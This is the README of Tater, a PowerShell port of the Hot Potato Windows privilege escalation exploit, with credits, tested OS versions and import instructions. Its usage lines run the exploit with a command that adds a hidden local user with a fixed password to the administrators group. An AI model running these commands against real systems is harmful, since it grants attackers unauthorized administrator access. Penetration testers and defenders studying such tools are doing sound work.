Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit.

Credit

All credit goes to @breenmachine, @foxglovesec, Google Project Zero, and anyone else that helped work out the details for this exploit.

Potato - https://github.com/foxglovesec/Potato

Notes

This version has been successful for me on Windows 7, Windows 8.1, Windows 10, and Windows Server 2012 R2. I will hopefully be able to test it on Windows Server 2008 soon. Feel free to open issues here or reach out on Twitter @kevin_robertson with successes or failures for the remaining OS versions.

Usage

To import with Import-Module:
Import-Module ./Tater.ps1

To import using dot source method:
. ./Tater.ps1

Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

Screenshots

Windows 7 using trigger 1 (NBNS WPAD Bruteforce + Windows Defender Signature Updates)

Windows 10 using trigger 2 (WebClient Service + Scheduled Task)

Windows 7 using trigger 1 and UDP port exhaustion